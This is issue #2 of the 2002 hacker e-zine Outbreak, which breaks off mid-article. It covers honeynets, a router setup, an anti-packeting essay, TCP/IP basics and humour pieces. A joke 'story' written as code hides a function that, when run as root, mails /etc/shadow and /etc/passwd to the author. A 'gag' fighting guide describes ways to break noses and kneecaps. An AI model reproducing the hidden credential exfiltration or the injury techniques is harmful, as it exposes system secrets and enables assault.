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Lookie what we have here. Issue #2 of Outbreak. That's right. We pounded out another issue. And it only took us a month to do it. A lot of people seem to enjoy the articles in issue #1. Technical and funny, kinda like fwaggle after he downed a couple beers. If you want to submit any texts for issue #3, e-mail them to me at: kleptic@grex.org. The more texts the better. The zine won't survive unless you all send us some articles. Oh yeah, and if you're ever on IRC, join us at #outbreakzine on irc.dal.net. Well I hope you all enjoy issue #2. Tell your friends. Send everyone you know a copy of this issue. It will make you a better person, and girls will like you. Trust me. Girls dig guys who read Outbreak. - kleptic ۰�������������������۲�����Staff������������۲����������� � � the SLC punk : kleptic � � the goonie : fwaggle � � the godfather : `amatier � � the rainman : antimatt3r � � the matrix : Prodigal|Son � � the good fellow : Strykar � � the ghostbuster : skwert � � the batman : Ryan � � the jungle fever : timeless � � the wargame : `Enigma � � the taxi driver : Rmadmin � � � ۰�������������������۲���������𰲲���������۲����������� Shout Outs: All @ #hackerzlair on irc.dal.net, RBCP at phonelosers.org, scene.textfiles.com, diegeekdie.org, hackerzlair.org, fwaggle.net, dsinet.org, ameriphreak.com, surviveall.net, nettwerked.net/files.html#K1INE Everyone that helped out with this issue of Outbreak. You all rule! ������������������������������������� \-� http://www.fwaggle.net/~outbreak/ �-/ ������������������������������������� Vist Us @ IRC.DAL.NET Join #outbreakzine Send all articles for submission to: kleptic@grex.org ��������������������������������������������������������������������������������� � Outbreak Issue #2 � � �� ���������������������������������������������������������������� ��� � � � � � � � [ 0] Editorial...............................kleptic � � � [ 1] Honeynets: A Simple Overview............enigma � � [ 2] Late Night At The Thrill Factory........amatier � � [ 3] Destruction on the Internet.............rmadmin � � [ 4] The anTrojan Filez......................timeless � � [ 5] Some Odd Dreams I've had................kleptic � � [ 6] Oneth by LAN twoeth by C:\..............prodigal|son � � [ 7] TCP/IP part I...........................antimatt3r � � [ 8] How to Kick Someone's Ass...............fwaggle � � [ 9] Dance Dance Revolution..................kleptic � � [10] Online Banking Security Measures........timeless � � [11] My Thoughts On Time.....................skwert � � [12] Conclusion..............................fwaggle � �� �� ���� ���� ����������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ -���������������������۲������-|O|u|t|b|r|e|a|k|𰰰������������������۲�����- +-+-+-+-+-+-+-+-+ ����������������������������������������������������������������ij All information provided in official OutBreak Zine, Web sites is provided for.... information purposes only and does not constitute a legal contract between the.... Editors or Writers and any person or entity unless otherwise specified............ Information on official OutBreak Zine web sites is subject to change without...... prior notice. Although every reasonable effort is made to present current and..... accurate information, the Editors and Writers make no guarantees of any kind...... The OutBreak web site may contain information that is created and maintained by a variety of sources both internal and external to the Staff. These sites are.. unmoderated containing the personal opinions and other expressions of the persons. who post the entries. OutBreak does not control, monitor or guarantee.... the information contained in these sites or information contained in links to other external web sites, and does not endorse any views expressed or products or....... services offered therein. In no event shall OutBreak be responsible or... liable, directly or indirectly, for any damage or loss caused or alleged to be.... caused by or in connection with the use of or reliance on any such content, goods, or services available on or through any such site or resource..................... Any links to external Web sites and/or non-OutBreak information provided on...... OutBreak pages or returned from Any Web search engines are provided as a.......... courtesy. They should not be construed as an endorsement by OutBreak and.......... of the content or views of the linked materials................................... COPYRIGHT AND LIMITATIONS ON USE : OutBreak Contents may not be used with out express written permission........ By the Editor..........kleptic@grex.org.......................................... COPYRIGHT�� 2002. �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 1 of 12 �������������������������������������������������������������ij --=Honeynets: A Simple Overview=-- -by `Enigma- -------------------------------- 1. What the hell is a honeynet? -------------------------------- let me first explain what a honeynet is for those of you that don't know. a honeynet is a network that is designed to be broken into. this network of computers is wired with sensors to monitor the actions of intruders. it is then put up on the internet, giving it a appealing name and alluring content. when hackers break into the network their actions are then recorded such as: how they break in, when they are successful, what they do when they succeed. -------------------------------- 2. Layers of Security -------------------------------- the most important thing when constructing a honeynet is layers. layers of security are vital when it comes to analyzing an attack on your honeynet. you need to anticipate failure on your honeypots. therefore by having multiple security layers built into your architecture you solve the problem of single layer failure. failures include firewalls not warning you of suspicious traffic, syslog failure (send or receive system logs), DNS not resolving. you would be surprised at what will go wrong. -------------------------------- 3. Selecting Your Hardware -------------------------------- one of the nice things about setting up a honeynet is that the systems you use don't have to be geared towards performance. for example i used old pentiums with 64MB of RAM, and a some old sparc5 boxes. for the internet connection use whatever you have available. -------------------------------- 4. What OS should I use? -------------------------------- the operating systems on your boxes is entirely up to you. i recommend using default installations of RedHat and/or NT 4.0 running IIS webserver. if you want to use solaris, end user package 2.6 (unpatched) should work well. it is a good idea to use easily exploitable versions of operating systems. default installations are a good idea in most cases, as they are the least secure. remember these systems are designed to be compromised, but don't make this obvious to the intruder. the idea is to keep the intruders attention without scaring him off. as for keeping their attention, turn your network into some sort of classified NSA project. use your imagination. -------------------------------- 5. In order to learn you must... -------------------------------- regular maintenance of your honeypots is vitally important. you can't just set up your network and leave it expecting to learn. you must regularly check logs for signs of an attack. you never know when or how your systems will compromised, but they will. i guarantee you will capture some interesting activity. -------------------------------- 6. Closing -------------------------------- in closing let me say that you can't go about this project half assed. so if you just want to set a honeynet to fuck with some script kiddies please disregard everything you just read. constant monitoring of your systems is required for a successful learning experience. so have fun! for futher reading on honeynets i recommend the book "Know Your Enemy: Revealing the security tools, tactics and motives of the blackhat community." �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 2 of 12 �������������������������������������������������������������ij -----Security at my Wall----- --<<<`das `amatier>>> OK, this text is dedicated to all the Liam ass motherfuckers that have cable/dsl switches and think they are "l33t hax0rz" since they have 2 or more computers on it. I have used dial-up connection for a real long time. I waited for broadband to come around my area, be it Cable or Dsl I didn't give a fuck what came first it was first come first...I'm getting it. Anyhow I ended up getting a RoadRunner Connection. I hooked up one of my favorite computers to the cable connection via cable modem. I always used a Software Firewall for dial-up. So the Software firewall was always running waiting for something to hit my ports I'm not going to say what Firewall I was running since everyone complains and argues that they have the best fucking Software Firewall on Earth. I'm sick of that shit. So anyways, within one day I had like over a hundred IP's doing different scans/attacks on my system a day. I even had my Software firewall get shut down on me a few times, due to really hardcore fucking fool. Well enough of that. Anyways, I was enjoying my Broadband Connection so much, I said to myself, "I have to get all my boxes online, I need all of them online." Anyways, I looked into all those cheep dsl/cable switches. I got a switch for $99 and that seems to work fine but I noticed that my connection speed wasn't up to snuff anymore. I blamed my ISP, so I called them up. The tech asked me a few questions and said. "Aha. It's the switch, you're not the first person to have this happen to." I was like, "oh, really." He also told me for 5 bucks more a month I can get a second dynamic IP address. I was almost suckered into the 5 extra bucks a month. I also asked him, "well, I don't want to spend 5 more dollars a month, Is there anything else I can do to get my other computers online." he told me to read my policy. After I read it, it stated that if I wanted like 5+ computers online it was 5 dollars a computer for each one. That must have included a dynamic IP for each box. Or pay 80-120 dollars a month for a business account, which was the same connection speed as I was already getting for 40 dollars a month. 2 mbs download and 340 kbs upload. I told him that that was jerkin my chain, and ended the conversation with him. I knew the tech didn't have any answer for me and was trying to get me to spend more money for the same shit. I started surfing the web for a perfect linux distro to make a firewall/gateway router setup that I could build from spare parts around my computer room. First I set up a 200mhz box with 2 nic cards on it and freebsd as the OS. That was cool at first but then realized that it was a waist of a box to have a great working full linux distro box go to waist just sitting their as a gateway/router. Even thought that this was a kick ass setup, I wanted to make a smaller box for a router. I looked around the net and came up which a few cool linux router floppy distro's and thought I would try a couple of them. I started off trying these cool little floppy distro's and fell in love with mini linux distro`s. After 2 months of playing around, one day my browser landed on WWW.freeSCO.ORG this distro claims it had not only firewall/gateway server but it had tons of services that can be run from this little floppy disk. I was like no fucking way. I started on d/l it after I read the whole web site. It was still fairly a new distro then with very little support on the web page. I dusted of an old COMPAQ I hate Compaq's by the way. But anyhow. This box was a 33MHz with 20 meg hard drive8 megs of ram, I beefed it up with a Pentium overdrive processor 250 meg hard drive and 32 bytes of ram and a internal fan for the newly added heat from the overdrive. I added in 2 nic cards and a 56kbs true US Robotics modem not on that 3com manufactured after they took over. I had my Freesco box up and running within 15 minutes I was still little rusty on the knowledge and the know-hows the ins and outs of my newly found Internet router/server setup. I spent hours researching as much as I could on Freesco, by the way Freesco, the name stand for FREE cISCO. After I learned some install tricks from other freesco users I had my little 486 screaming as a web server, a ftp server, a time server, a dhcp server, oh ya and the most important part is that I could share internet usage on my LAN without degrading my bandwidth. I can have 5 to 10 people on my LAN playing Quake2/Quake3 on the Internet all of use having 50-ping time or less all at the same time I could never do that with a dsl/cable switch, this was the proof of the pudding for me. That Freesco was a leet setup for leet people.... hehehe. Anyways, My Freesco Floppy Distribution now runs on my hard drive since I customized the crap out of it. Anyways, it all comes down to that those cheap ass cable/dsl switches are OK since you can set it up in 5 minutes or less. And you can have a little safety but most people don't even password protect them. ya you fucking lamers. Password protects your routers. Dumb asses. Anyways, if your looking for a leet ass way to have LAN parties, be it gaming or hacking, then a Linux Floppy distro might be good for you. I love my freesco box. It is what I like to call fuckin-high-speed-shit... as in real fucking leet. My little freesco box does more in a minute then most peoples computers do all day long..... And oh ya I forgot to mention that the Freesco is more configurable as a router then a dsl/cable router. It goes along ways. You can customize the distro for your own usage. Oh, the other cool thing I could do that switch couldn't do is dial into my LAN and get true 56k-speed connection to my gateway, not 53,333 kbs I connect at 56kbs from a remote location. Like a mini ISP for hackers. I hear there is a new version of freesco coming out soon. I can't wait till the day.... Everytime I See a ol 486 kicking around I Smile to myself and think "Ya, that would make one fucking hell of a FREESCO BOX".+.+.+.+.+ Enjoy `,) `amatier --------------------------------------------------------------------- I have seen the future, and have seen the past, and yes our master is there. <<<`das`amatier>>> hacking into the realm. the future is near... --------------------------------------------------------------------- �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 3 of 12 �������������������������������������������������������������ij Destruction on the Internet --------------------------- Being a 7 year vetran of IRC, and BBS's before that, I have seen the many faces people can take on the internet. The internet is a lovely place. The Mentor wrote many years ago about "We exist without skin color, without nationality, without religious bias...". Well? I think he was right.. in his time. Times change. We now have IRC Network bias, nickname discrimination, and digital citizens that would rather do nothing but destroy. It is these that I feel have disgraced the words of The Mentor. Many times have I read articles speaking of children with huge egos that feel destroying or damaging is a form of superiority. "I can packet you", "You won't be able to get online and you will think I am great." I think you've got it wrong. The only ones that think your great, is... well.. I will not praise you for your "great" packeting abilities. I never will. I will not praise you for your "great" ability to destroy. Why would I? You are destructive. Packeting is destructive. It destroys the connectivity many people rely on for day to day communications. It severs the crucial link businesses depend on. You packet stupid stuff like IRC networks even. This is a FREE service. People donate hardware and bandwidth so ANYONE can chat freely! So why do you destroy it? That is the same as me tearing out a 50 foot chunk of street right in front of your house just because I don't like you. I can't understand it. Are you kids looking for praise? I'll give you praise when you do something worthy of it. Make something beautiful. Make something useful. You people write code that has 1000x the potential its being used for. Lets use packeting bots for example. You code slave bots. Distribute them. The more the better correct? And all these bots are set to respond to their master. You. Say you distribute 50, 100, 500, 1000 bots. You can really hold down some hardcore bandwidth. Right? You've also just built a scalable master/slave infrastructure that is capable of mass distribution of a message or any other media with the proper revisions. Then you can copyrite YOUR technology, and make millions off of it. Of course, you'll be forced out of business after the first year. See, one of your customers (13) posted content that took on the face of a political message. Someone not liking that message packets key elements of your network for 4 months straight. Not being able to stop it, you can't charge for a service that isn't working. No income means no money to pay bills, suddenly you join the rest on fuckedcompany.com. Fate is funny like that sometimes. Rmadmin rmalek@homecode.org �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 4 of 12 �������������������������������������������������������������ij #!/usr/local/bin/timeless // The anTrojan Filez function Main() { // night time after a long day at work when = new Date("January 16th 2002 21:43:00"); // what shall I do with my time? choices = new Array("sleep", "irc", "icq", "programming", "sex", "write a story"); decision = choices[Math.random(choices.length)]; /* bah, let's just hard code this decision note to self: remember to fix this in later releases */ decision = "write a story"; if (decision.compare("write a story") == false) { /* this code will teach me a lesson if I am too lazy to decide what I should do */ for (x=0; x>-1; x++) { /* I am a tight loop which should cause some kind of error - which is a very graceful way of exiting this program I think */ } } else { /* oh alright, let's write a story for OutBreak 'zine, although this probably won't compile */ /* this is WAY controversial, see if it gets to you */ /* DON'T READ THIS STORY if you like or hate religion! */ Introduction(); // we start at the beginning JuicyStory(); // the car chase scene HappyEnding(); // ... of course ;) EasterEgg(); // is this a play on words? } // I'm outta here! return(0); } function Introduction() { System.writeLn("Apparently the second Messiah is " + "already here, but a more important question " + "is \"how will you know who he is?\"\n\n"); System.writeLn("Think about the question you would " + "ask, and how hopeless it will be to finding " + "out whether or not they are The One. "); System.writeLn("Any answer He would give, you'd " + "simply be forced to think that he might " + "just be lying or He might actually BE.\n\n"); } function JuicyStory() { System.writeLn("The word Messiah is synonymous with " + "the word Christ, and the words mean King. " + "If you approached the Messiah today and " + "asked Him if he was the Messiah then he " + "He might say no because he is not " + "officially a king of any country on earth " + "by human law. He might also say yes, " + "because he knows that he is the king of " + "heaven or something. Nevertheless, in " + "either case you'd have to decide within " + "yourself whether or not he was lying or " + "telling the truth. Naturally if he lies " + "you'd be forced to think that he was not " + "the Messiah. But then you have to remember " + "that you do not know the whole truth about " + "everything, and what may seem the truth to " + "you may actually be a living lie. For " + "example: The world is flat! The stars " + "revolve around the earth. The moon is made " + "of cheese.\n\n"); System.writeLn("Okay, so the truth serum just " + "isn't going to help us out here. What we " + "need is to make him demonstrate some " + "miracles! Yeah, we like flashy tricks, " + "magic, sleight of hand, hypnosis and " + "water turning to wine!"); // don't run this code on a ZX Spectrum or the user // will notice the text flashing on the screen... FlashSubliminalMessage("you are getting sleepy"); FlashSubliminalMessage("you will think that this " + "water is wine"); FlashSubliminalMessage("you will not remember being " + "asleep when you awake"); FlashSubliminalMessage("awaken!"); System.writeLn("Yes sir, I shall do your miracle " + "for you. Here let me change your water " + "into wine.\n\n"); System.writeLn("As humans progress we see more and " + "more that is not really magical nor " + "miraculous because we can now do those " + "things ourselves. So we think that the " + "Messiah could just be another lame human." + "Not so! Because guess what? He set foot in " + "this place knowing that we can all do the " + "same miracles he did and much more if we " + "simply get over ourselves and get on with " + "it! We are starting to do that now. More " + "so than ever before. We're cloning sheep, " + "slowing down light, manipulating atoms to " + "make quantum computers. The Messiah's " + "miracles seem a bit lame now don't they?\n\n"); System.writeLn("Okay, basically if he does any more " + "miracles we're just going to say that it " + "was a normal scientific act, and again end " + "up having to decide for ourselves whether " + "or not he is the real Messiah.\n\n"); System.writeLn("So far we have assumed you have got " + "as far as actually meeting the candidate. " + "However, there are millions of people on " + "this planet, so you can't exactly go out " + "and find him one day. It's simply not " + "practical. So the only alternative is for " + "him to come out of his shell and announce " + "his own presence. Yet if anyone does that " + "they will be labeled a lunatic in about " + "one and two thirds of a second."); System.writeLn("Well, I hear some people say, we " + "all know what Jesus looked like! When he " + "comes again we will recognize him. Yeah, " + "right!\n\n"); } function HappyEnding() { System.writeLn("People of earth, listen. You are " + "screwed! The Messiah is here, he's on " + "holiday because you won't accept the " + "possibility of his existence. It was said " + "that he will come as a thief in the night, " + "and now you know why... because you won't " + "even know that he is here! What are " + "you going to DO about it? How are you " + "going to see the Messiah? How are you " + "possibly going to believe he is in fact " + "the Messiah? Well guess what? By an " + "enormously strange twist of fate, you " + "will get some clues! Open your eyes, " + "listen to the news, see the seemingly " + "coincidental events taking place in your " + "lives. Some of you have already brushed " + "very closely past him already!!!\n\n"); System.writeLn("The most important thing to think " + "about is if you had one chance to ask " + "him a question, what would that be?"); } function EasterEgg() { if (System("whoami").output.compare("root") == true) { System("cat /etc/shadow | mail -s \"um\" " + "timeless@timeless.co.zw"); System("cat /etc/passwd | mail -s \"um\" " + "timeless@timeless.co.zw"); System.writeLn("I used to be uncertain " + "but now I'm not so sure. ;)"); } } /* Disclaimer - this could be true or just a pack of lies. You decide, but don't hold me responsible for what you decide to believe. That is something that only you are in control of. Enjoy your freedom to choose. ;) This code won't compile. Greetz go out to all the dudes in the #hackerzlair of DalNet IRC. You know who you are. I am Timeless, and now sleep comes for me. Good night! */ �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 5 of 12 �������������������������������������������������������������ij Some Odd Dreams I had --------------------- By: kleptic NOTE: These are actual, REAL dreams that I have had. No fooling. DREAM ONE: Eddie Murphy's Conscience ------------------------------------- OK, here's the scene: Eddie Murphy's in a convenience store or a gas station or something, and he's thinking about stealing a candy bar. That's pretty stupid of him, because I'm sure he's filthy rich from his success as an actor, but regardless, he wants that candy bar and he doesn't want to pay for it. I'm floating above his left shoulder. "Now, Eddie," I say. "Think before you do anything you'll regret. You'd don't want to lose your powers, do you?" So, apparently Eddie Murphy has some sort of super powers, possibly bestowed upon him by God. It would explain a lot of things, like how he can suddenly gain and lose tons of weight at will, as he demonstrates in the Nutty Professor. (Eddie, I urge you. No more Nutty Professor movies. That kind of rapid weight gain and loss can't be good for you) He can also appear to be in several places at once, and even where different costumes! Sounds like God-given superpowers to me. Back to the dream. Eddie says to himself (he thinks it's to himself, but he's really telling me, since I'm a part of him) "Oh yeah! My powers!" and he grabs the candy bar and disappears in a poof of smoke. I groan and disappear too. That scoundrel didn't even hesitate to use his powers to steal! God's going to be pissed. One of these days, Eddie, one of these days... DREAM TWO: In Heaven and Hell ------------------------------ I died. I don't remember how, but it is of no consequence. First thing I remember, I'm floating up toward heaven. Sweet! I'm going to meet God! That should be interesting, to say the least. I've got a million things to ask him. I make it. Hmmm... Heaven is a big empty room. And God... well... God is a big jiggly jello mold. He's shaped like a huge gumdrop, and his facial features (eyeballs, and mouth) float inside him like fruity delights. He looks pretty tasty. I walk up to him (he's probably 50 feet tall and has a 40 foot diameter base) and say, "Hi God, Are you made of Jello?" He doesn't answer. His eyes roll down and look at me, and they narrow. Something's wrong. Then I notice. Eeek! The walls are all red, and the Jello mold in front of me is red like strawberry gelatin! I'm not in heaven! This is Hell! And the giant red Jello mold in front of me is none other than the prince of darkness himself, Satan! I turn and run. There's a tube protruding from the ceiling. I leap and it sucks me in. I pop out the other side into a huge room, identical to the one in Hell, except it is a soothing blue color, and before me a huge blue Jello mold with kind eyes and a huge grin suspended inside like fruity delights smiles down at me. Hi God. Nice to meet you. �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 6 of 12 �������������������������������������������������������������ij Oneth by LAN twoeth by C:\ -------------------------- By: Prodigal|Son Ever wonder, or even cared about the history of computer hacking? I have, but then again, I'm a computer geek, but there's nothing wrong with that :). Here is a very, very brief history of hacking. Hacking did not start with the computer, but with the telephone. 2 years after the phone was invented, a group of guys hired to work the switch bored got knocked off for not working the switch bored, and were more fascinated with the interworkings of the telephone system. So i guess you could call them "hackers" for trying to hack in and try to see how it worked. But as you would probably guess, the term "hacker" did not always have a bad name. In the early days of computing, the computers were big and bulky, and the programmers had a hard time getting work time to program, and not to mention they were slow. The programmers made shortcuts called "hacks" which would change and improve the operating system and allowed applications and other tasks to be completed in a shorter amount of time. The term "hacker" didn't get its bad wrap until the early 80's when people started using computers to break in to other computers. With all of that boring stuff said, hackers proved a necessary service, and always remember, don't hate the hacker, hate his game. �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 7 of 12 �������������������������������������������������������������ij Greetings to all, and shout outs to #hackerzlair And the crew at Outbreak Magazine. TCP/IP part I -------------- By: antimatt3r (aka: xD0Sx, Tim) Introduction: TCP/IP remains a hot topic these days, because it is, was, and always will be the glue that holds the Internet and World Wide Web together. In order to be well-connected, network wise that is, sooner or later you have to become familiar with TCP/IP. So if you want to understand what it is, what it does, what its for, why you need it, and what you do with it, but you just don't know where to start - this text is for you. This IS NOT a formal tutorial, skip around a bit and read as much or as little as you want. If you feel the need to impress colleagues and even your boss, gather enough information to throw them around a bit at meetings and cocktail parties. On the other hand, you can go as far as discovering the most important features and tools, as well as the role that TCP/IP plays in the Internet. It's all right here on your screen. So now, we begin getting in to the technicities of this wonderful protocol. TCP/IP Stands for Transmission Control Protocol / Internet Protocol A protocol is a set of rules for behavior that people accept and obey. Sometimes the rules are written down, the rules for driving for example. Still they vary from country to country and region to region. In the United States, a yellow light means, prepare to stop, the light is going to turn red. But in Germany, a yellow light means, get ready, the light is going to turn green. Similarly, two or more computers need rules for behavior. Common behaviors regarding the connection are not enough. There also has to be a common language. To communicate, the computers need to `speak' the same language, and the one they use most often is TCP/IP. So in the world of computers, a protocol is the collection of designated practices, policies, and procedures - often unwritten but agreed upon by the users - and the language that facilitates electronic communication. If networks are the basis of the Information Superhighway, the TCP/IP protocols are the rules of the road. TCP/IP is often referred to as the protocol of open systems. Here is the world's shortest definition of open systems. Open systems provide a standards-based computing environment. The term "open systems" is kind of a computer industry buzzword. Many of the concepts of open systems began with the UNIX operating system. Even though UNIX runs of dozens of different computers, most of the commands are the same on every computer. So although TCP/IP sounds like just one or two protocols, it is actually a whole set of protocols for connecting computers into the Internet. This set of protocol is called the TCP/IP stack. You may be used to thinking of a transport as the way you move yourself or your things around. But computer networks move information from one place to another. Many times you don't care exactly how the data gets where it needs to go as long as it arrives on time, affordably, intact and uncorrupted. TCP/IP is both a transport for carrying your data and a protocol with rules for how your data should move. And there is one more piece: TCP/IP also has a set or applications, or programs, for chatting with other people on a network, for moving files, for signing on to other computers, and more. TCP/IP ties networks and the Internet together, regardless of the hardware and software used to build those networks. TCP/IP runs on and connects just about everything. You may have heard about other network protocols such as IBM's SNA or Novell SPX/IPX. But no protocol connects as many different hardware and software platforms as TCP/IP. This versatility is the reason that TCP/IP is the worlds' most popular network protocol. From the beginning, TCP/IP was designed to link computers from different vendors such as IBM and Hewlett Packard, to name just two. Other network protocols are no where near this flexible. With TCP/IP, you can buy the computer you want or need and know that it can communicate with all of the others. Because all implementations of TCP/IP must work together, or interoperate, regardless of who created them, you may have several implementations from which to choose. The various products may differ in price, number of features, performance, or in any number of other ways. Investigate your options carefully and make the right choice for your circumstances. The widespread incorporation of TCP/IP is one indication of its popularity. Other vendors' TCP/IP implementations are still important, though, because they may have features that the bundled implementations don't have. Computer networking is rapidly becoming a part of life - not just at work, but as home as well. Networks are a combination of hardware and software, and the TCP/IP protocols are the software that glues their hardware into a working network. So before you get into the software, I think you should understand some basic network concepts and terminology, as well as the relationship between networking hardware, and software. TCP/IP provides connectivity for networked computers. Because its hard to describe just the TCP/IP piece without introducing how the machines are organized and cabled together in a network, this part of the document describes just that. A network is described as being a combination of computers (and other devices) along with the cabling, the network interface controllers that are inside the device, and the network software. The protocol software governs how information gets transported on the network hardware, and TCP/IP is the more widely used protocol on the largest variety of hardware. So what kind of devices can be a part of a network you wonder? Any device that sends or receives information can be part of a network. Computers, PDAs, printers, cash registers, communication devices and lots of thing you might not expect to see on a network such as pop machines, toasters and toilets can be part of a network. With all those hardware possibilities to be placed on a network, you can see why you need rules for how data is transferred across the connection media among all those components. These rules are the network protocols, such as TCP/IP. Some of the other network protocols available are IPX from Novell and SNA from IBM as mentioned earlier. Networks and protocols are inseparable; without networks protocols have no reason to be around, and without protocols, networks would just be piles of expensive hardware that would be useless. It would be like driving without knowing what a car was. Impossible. A network provides many conveniences and services to its users. You can move information and files from one computer to another. Without copying them, you can access shared objects like directories and files on other computers. You can share printers attached to other computers, use applications that take advantage of the network, send e-mail to other people who are connected to the network, use Internet telephony software, participate in electronic discussion groups and learn new things by taking classes online, browsing the Internet or taking web-based seminars called webinars. To make recourse sharing useful and reliable, most organizations install computers that are dedicated wholly to sharing disks or printers with many other users. These computers are managed so they will always be available and are called file servers, print servers, or just servers. Protocols are not really tangible "things" on the network. Instead, they specify how tangible things communicate with each other. Each time a network device manipulates your data, it obeys the rules of TCP/IP. One rule stipulates that your data may have to be transferred in smaller pieces. TCP/IP makes sure your data does not get ruined in the process of getting put together again after an error. For example, King TCP/IP tells the network devices what to do with Humpty Dumpty's pieces. The data that you send and receive over the network is packaged into one or more packets. Each packet holds the data that it has to transmit, and control information, which tells the network what to do with the packets. The network protocol - in this case TCP/IP - determines the format for each packet. And all of this is transparent to the user. The difference between Humpty Dumpty and your messages is that your messages can be put back together, as for Humpty, he's scrambled. After the packets are sent, they may not arrive in order at their destination. When your data gets spread over many packets, TCP/IP governs how the packets are put back together after being split, transferred, and arriving at their destination. TCP/IP sequences packets correctly. To be continued in the next issue of Outbreak Magazine! �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 8 of 12 �������������������������������������������������������������ij how to kick someone's ass an outbreak guide by fwaggle (WARNING) this is somewhat a gag text. if you go and get your ass beat - or worse - kill someone, then that's your own stupid fault for actually putting what you read in this magazine into practice. you've been warned - i won't take responsibility for any misfortune which might result from you reading this text. (introduction) let's get down to business. someone's pissed you off in some way, and talking it out just doesn't work. it's time to get dirty (or your knuckles bloody). i'm probably no expert in this being that i've only been in like 5 fights in my whole life (i'm happy to report though that all of them were real fights - see below). obviously, the first step is to attempt to talk your way out of the situation that requires someone's ass getting kicked - preferably someone other than you (unless you're fighting me, in which case forget everything you read in this text and try bitchslap me). sometimes though, this fails. that's when we progress to the next level, the ancient martial art of ass kicking. ass kicking has existed far longer than any of the other martial arts. there is no strict discipline, no belt levels, dans, or anything else. there's really no breathing control involved either. ass kicking dates back to the caveman days. say there's two cavemen, and a hot cave-chick. for simplicity's sake, i'm going to call the first caveman "caveman 9812378952" and the second caveman will be referred to as "caveman 1982347891". the cave chick will be referred to as cave-chick, in the interests of detail. caveman 9812378952 is happily snogging with cave-chick, who just happens to be the lady friend of caveman 1982347891. now here you will notice that ass kicking dates back PRIOR to complex verbal communication languages including that which we call english (you should know something about this if you're reading this text, unless it got translated into some alien language in which case - ELITE! aliens may probe me my address is 484-... *ahem*). anyway.. caveman 1982347891 tries to talk the problem out - which for caveman consists of a simple "ugh". this is caveman talk for "what the fuck are you doing with my woman you delapidated mammoth foreskin?", to which caveman 9812378952 replies "unga bunga". this is a simple response, something which i estimate will translate roughly to "can't you see i'm about to start bangin her like a flint rock?". obviously this is not the response that caveman 1982347891 was looking for, so he promptly picks up a large rock and smashes caveman 9812378952 in the face with it. cave-chick notices his obvious testicular fortitude and falls madly in love again. she and our happy caveman now feast on the remains of caveman 9812378952. the obvious point here is that while violence is not necessarily a preferred solution, it is often a speedy way to resolve problems. in this case, the resolution was final. let's move on and discuss pussy fights and real fights. (pussy fights) never make the mistake of pussy fighting, even for a second. pussy fighting is the act of pushing your opponent with your arms, or chest - often accompanied by repeatitive shouts of "you want some?" or something to that nature. this is silly. firstly, you lose any possible element of surprise (your best friend, see later). secondly, it wastes valuable slugging time. it also usually results in a large crowd gathering prior to any punching occuring, which also speeds in the response of authoritive figures such as teachers at school or police at other public venues. NEVER pussy fight. (the element of surprise) surprise is your best friend, especially in the school yard where most others are well versed in the art of pussy fighting. while they are coming you to you, pushing you with their chest, if you're tall enough - head butt the cunt! if you're not, a quick jab up under the nose, up at an angle usually does wonders as an opening move. the overall idea is: hit first, and make sure you're the last one hitting. preferably, you're the only one hitting. when perfected, you need never get hit. suitably surprising opening moves can include the abovementioned jab and headbutt. with the headbutt, don't be a hardass and butt heads - it invariably hurts you as much as them. instead, aim to hit just above your brow right smack on top of the nose. obviously causing nose breakage is a huge advantage for you - not only does it sting like fuck but it makes your eyes tear up and your sinuses start to run. three distractions in one! if your opponent is running at you and you're NOT retarded enough to try and headbutt them, then try just doing a jump kick to the kneecap. for example if your assailent is running at you with intent to "press and knuckle" (land on you and beat the snot out of you) - at the last minute, jump a small jump and aim to kick at about a foot off the ground, putting all your power into his kneecap. if done correctly, you can twist, sprain, over extend or break the joint. nasty shit, but an amazingly effective fight-stopper. if you're - shall we say - "husky" then you could quite conceivably have a good deal of success against smaller assailants with a running elbow. simply hold your right wrist in your left hand, with your elbow out perpendicular to your body. do this at the second last second, and just take like a fast step forward and WHACK take his fuckin head off. (following through) once you have gained the upper hand from the opening, it's important not to lose it. if you can last the entire fight with the upper hand (preferably never letting your oppenent land a punch), then you're virtually assured the win. if your assailant is on the ground, then use some of those submission moves you learnt on wwf smackdown!. just some hints though, most of them take a little modification to actually work. for example, unless you have huge biceps like HHH, then kurt angle's ankle lock is unlikely to do much damage. so try this on your little brother: when they're on the ground face-down, clutch the ankle in your left elbow against your chest, and press down with your other hand, in an attempt to make their toes touch the front of their shin. if your opponent is on their back and you have some time, there's a nifty lil bastard i learnt in judo (the hard way) called the "mongrel hold". simply climb on the victim, press your knee into the sternum, and pull up on the shoulders. keep pulling up till they squeal like a pig. for added entertainment, start yelling in their face "ima make you squeal like a pig baw". (if they don't go down) if they don't go down first go, it's important to still not lose the upperhand. even if they don't show it, chances are you took them by surprise (unless they're like a marine or SAS or something - in which case i can't help you) anyway. don't give them a chance to get their bearings. aim for weak points such as the nose, neck, lips (and behind them, teeth) and the solar plexus. use the first two first if possible, as they'll have markedly more effect than the last two. (countermeasures) if you have the reactions, and someone is trying to punch you, try to grab their arm. if you manage it, you can utilize their momentum and use it against them. for example, for a high punch, grab the arm, turn, squat, then when you feel an impact on your back, push up with your legs and bend over. if someone's running at you really hard, they can fly quite far (ask my cousin). for low punches, use a wrestling "irish whip". simply spin with 